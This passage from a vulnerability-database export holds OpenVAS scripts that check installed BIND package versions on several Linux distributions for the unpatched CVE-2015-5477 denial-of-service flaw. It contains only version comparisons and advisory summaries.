script_cve_id(\"CVE-2015-5477\");\n script_name(\"Debian Security Advisory DSA 3319-1 (bind9 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-07-28 00:00:00 +0200 (Tue, 28 Jul 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3319.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"bind9 on Debian Linux\");\n script_tag(name: \"insight\", value: \"The Berkeley Internet Name Domain (BIND) implements an Internet domain\nname server. BIND is the most widely-used name server software on the\nInternet, and is supported by the Internet Software Consortium, www.isc.org.\nThis package provides the server and related configuration files.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy), this problem has been fixed\nin version 1:9.8.4.dfsg.P1-6+nmu2+deb7u6.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:9.9.5.dfsg-9+deb8u2.\n\nWe recommend that you upgrade your bind9 packages.\");\n script_tag(name: \"summary\", value: \"Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"bind9\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9-doc\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9-host\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9utils\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"host\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind-dev\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind9-80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdns88\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisc84\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccc80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccfg82\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblwres80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lwresd\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:26", "description": "Check the version of bind97", "cvss3": {}, "published": "2015-08-10T00:00:00", "type": "openvas", "title": "CentOS Update for bind97 CESA-2015:1515 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882233", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882233", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind97 CESA-2015:1515 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882233\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-10 12:58:28 +0530 (Mon, 10 Aug 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bind97 CESA-2015:1515 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of bind97\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named) a resolver\nlibrary (routines for applications to use when interfacing with DNS) and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"bind97 on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1515\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-July/021269.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind97\", rpm:\"bind97~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-chroot\", rpm:\"bind97-chroot~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-devel\", rpm:\"bind97-devel~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-libs\", rpm:\"bind97-libs~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-utils\", rpm:\"bind97-utils~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-01T00:00:00", "type": "openvas", "title": "Fedora Update for bind99 FEDORA-2015-12316", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869831", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869831", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind99 FEDORA-2015-12316\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869831\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-01 06:54:47 +0200 (Sat, 01 Aug 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bind99 FEDORA-2015-12316\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind99'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bind99 on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-12316\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163015.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind99\", rpm:\"bind99~9.9.7~6.P2.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:13", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-03T00:00:00", "type": "openvas", "title": "RedHat Update for bind RHSA-2015:1514-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871421", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871421", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bind RHSA-2015:1514-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871421\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-03 15:07:57 +0530 (Mon, 03 Aug 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for bind RHSA-2015:1514-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named) a resolver\nlibrary (routines for applications to use when interfacing with DNS) and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"bind on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1514-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-July/msg00051.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T18:38:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for bind (SUSE-SU-2015:1305-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851081", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851081", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851081\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 19:39:36 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bind (SUSE-SU-2015:1305-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"bind was updated to fix one security issue.\n\n This security issue was fixed:\n\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\");\n\n script_tag(name:\"affected\", value:\"bind on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:1305-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debugsource\", rpm:\"bind-debugsource~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo-32bit\", rpm:\"bind-libs-debuginfo-32bit~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo\", rpm:\"bind-libs-debuginfo~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ind-utils-debuginfo\", rpm:\"ind-utils-debuginfo~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debugsource\", rpm:\"bind-debugsource~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo\", rpm:\"bind-libs-debuginfo~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils-debuginfo\", rpm:\"bind-utils-debuginfo~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo-32bit\", rpm:\"bind-libs-debuginfo-32bit~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:53", "description": "Oracle Linux Local Security Checks ELSA-2015-1515", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1515", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123051", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123051", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1515.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123051\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:58:44 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1515\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1515 - bind97 security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1515\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1515.html\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bind97\", rpm:\"bind97~9.7.0~21.P2.el5_11.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind97-chroot\", rpm:\"bind97-chroot~9.7.0~21.P2.el5_11.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind97-devel\", rpm:\"bind97-devel~9.7.0~21.P2.el5_11.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind97-libs\", rpm:\"bind97-libs~9.7.0~21.P2.el5_11.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = 